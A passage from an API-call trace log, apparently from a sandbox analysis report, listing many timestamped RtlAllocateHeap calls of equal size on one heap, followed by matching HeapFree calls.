(HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x25fbd60 [0139.229] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x260ef70 [0139.229] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2622180 [0139.229] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2635390 [0139.230] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x26485a0 [0139.230] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x265b7b0 [0139.231] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x266e9c0 [0139.231] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2681bd0 [0139.231] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2694de0 [0139.232] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x26a7ff0 [0139.232] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x26bb200 [0139.233] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x26ce410 [0139.233] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x26e1620 [0139.234] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x26f4830 [0139.234] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2707a40 [0139.235] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x271ac50 [0139.235] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x272de60 [0139.236] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2741070 [0139.236] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2754280 [0139.236] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2767490 [0139.237] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x277a6a0 [0139.237] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x278d8b0 [0139.238] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x27a0ac0 [0139.238] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x27b3cd0 [0139.238] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x27c6ee0 [0139.239] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x27da0f0 [0139.239] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x27ed300 [0139.239] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2800510 [0139.240] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x698) returned 0x4e88e0 [0139.240] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc5c0 | out: hHeap=0x4d0000) returned 1 [0139.240] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2813720 [0139.240] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2826930 [0139.241] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2839b40 [0139.241] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x284cd50 [0139.241] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x285ff60 [0139.241] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2873170 [0139.242] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2886380 [0139.242] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2899590 [0139.243] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x28ac7a0 [0139.243] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x28bf9b0 [0139.243] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x28d2bc0 [0139.244] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x28e5dd0 [0139.244] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x28f8fe0 [0139.244] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x290c1f0 [0139.245] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x291f400 [0139.245] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2932610 [0139.245] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2945820 [0139.246] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2958a30 [0139.246] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x296bc40 [0139.246] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x297ee50 [0139.247] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2992060 [0139.247] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x29a5270 [0139.248] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x29b8480 [0139.249] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x29cb690 [0139.249] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x29de8a0 [0139.249] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x29f1ab0 [0139.249] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2a04cc0 [0139.250] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2a17ed0 [0139.250] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2a2b0e0 [0139.250] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2a3e2f0 [0139.251] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2a51500 [0139.251] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2a64710 [0139.252] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2a77920 [0139.252] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2a8ab30 [0139.252] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2a9dd40 [0139.253] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2ab0f50 [0139.253] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2ac4160 [0139.254] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2ad7370 [0139.254] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2aea580 [0139.254] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2afd790 [0139.255] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2b109a0 [0139.255] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2b23bb0 [0139.255] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2b36dc0 [0139.256] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2b49fd0 [0139.256] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2b5d1e0 [0139.256] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2b703f0 [0139.257] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2b83600 [0139.257] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2b96810 [0139.257] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2ba9a20 [0139.257] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2bbcc30 [0139.258] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2bcfe40 [0139.258] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2be3050 [0139.259] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2bf6260 [0139.259] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2c09470 [0139.259] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2c1c680 [0139.260] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2c2f890 [0139.260] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2c42aa0 [0139.260] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2c55cb0 [0139.261] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2c68ec0 [0139.460] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2c7c0d0 [0139.460] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2c8f2e0 [0139.461] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2ca24f0 [0139.461] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2cb5700 [0139.462] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2cc8910 [0139.462] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2cf0080 [0139.463] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2d03290 [0139.464] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2d164a0 [0139.464] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2d296b0 [0139.465] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2d3c8c0 [0139.465] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2d4fad0 [0139.465] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x9e0) returned 0x4fc5c0 [0139.465] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e88e0 | out: hHeap=0x4d0000) returned 1 [0139.465] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2d62ce0 [0139.466] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2d75ef0 [0139.466] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2d89100 [0139.467] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2d9c310 [0139.467] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2daf520 [0139.468] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2dc2730 [0139.468] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2dd5940 [0139.468] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2de8b50 [0139.469] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2dfbd60 [0139.469] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2e0ef70 [0139.470] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2e22180 [0139.470] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2e35390 [0139.470] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2e485a0 [0139.471] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2e5b7b0 [0139.471] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x13200) returned 0x2e6e9c0 [0139.496] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4fc5c0 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x507450 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x527250 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x53a460 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x54d670 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x560880 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x573a90 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x586ca0 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x599eb0 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x5ad0c0 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1df0080 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1e03290 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1e164a0 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1e296b0 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1e3c8c0 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1e4fad0 | out: hHeap=0x4d0000) returned 1 [0146.896] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1e62ce0 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1e75ef0 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1e89100 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1e9c310 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1eaf520 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1ec2730 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1ef0080 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1f03290 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1f164a0 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1f296b0 | out: hHeap=0x4d0000) returned 1 [0146.897] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1f3c8c0 | out: hHeap=0x4d0000) returned 1 [0146.906] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1f4fad0 | out: hHeap=0x4d0000) returned 1 [0146.907] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1f62ce0 | out: hHeap=0x4d0000) returned 1 [0146.907] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1f75ef0 | out: hHeap=0x4d0000) returned 1 [0146.907] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1f89100 | out: hHeap=0x4d0000) returned 1 [0146.907] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1f9c310 | out: hHeap=0x4d0000) returned 1 [0146.907] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1faf520 | out: hHeap=0x4d0000) returned 1 [0146.907] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1fc2730 | out: hHeap=0x4d0000) returned 1 [0146.907] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1fd5940 | out: hHeap=0x4d0000) returned 1 [0146.907] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1fe8b50 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x1ffbd60 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x200ef70 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2022180 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2035390 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x20485a0 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x205b7b0 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x206e9c0 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2081bd0 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2094de0 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x20a7ff0 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x20bb200 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x20ce410 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x20f0080 | out: hHeap=0x4d0000) returned 1 [0147.060] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2103290 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x21164a0 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x21296b0 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x213c8c0 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x214fad0 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2162ce0 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2175ef0 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2189100 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x219c310 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x21af520 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x21c2730 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x21d5940 | out: hHeap=0x4d0000) returned 1 [0147.065] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x21e8b50 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x21fbd60 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x220ef70 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2222180 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2235390 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x22485a0 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x225b7b0 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x226e9c0 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2281bd0 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2294de0 | out: hHeap=0x4d0000) returned 1 [0147.069] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x22a7ff0 | out: hHeap=0x4d0000) returned 1 [0147.072] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x22bb200 | out: hHeap=0x4d0000) returned 1 [0147.074] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x22ce410 | out: hHeap=0x4d0000) returned 1 [0147.074] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x22e1620 | out: hHeap=0x4d0000) returned 1 [0147.074] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x22f4830 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2307a40 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x231ac50 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x232de60 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2341070 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2354280 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2367490 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x237a6a0 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x238d8b0 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x23a0ac0 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x23b3cd0 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x23c6ee0 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x23da0f0 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x23ed300 | out: hHeap=0x4d0000) returned 1 [0147.077] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2400510 | out: hHeap=0x4d0000) returned 1 [0147.081] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2413720 | out: hHeap=0x4d0000) returned 1 [0147.081] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2426930 | out: hHeap=0x4d0000) returned 1 [0147.082] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2439b40 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x244cd50 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x245ff60 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2473170 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2486380 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2499590 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x24ac7a0 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x24bf9b0 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x24d2bc0 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x24f0080 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2503290 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x25164a0 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x25296b0 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x253c8c0 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x254fad0 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2562ce0 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2575ef0 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2589100 | out: hHeap=0x4d0000) returned 1 [0147.083] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x259c310 | out: hHeap=0x4d0000) returned 1 [0147.089] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x25af520 | out: hHeap=0x4d0000) returned 1 [0147.091] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x25c2730 | out: hHeap=0x4d0000) returned 1 [0147.091] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x25d5940 | out: hHeap=0x4d0000) returned 1 [0147.091] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x25e8b50 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x25fbd60 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x260ef70 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2622180 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2635390 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x26485a0 | out: hHeap=0x4d0000) returned 1 [0147.247] HeapFree (in: 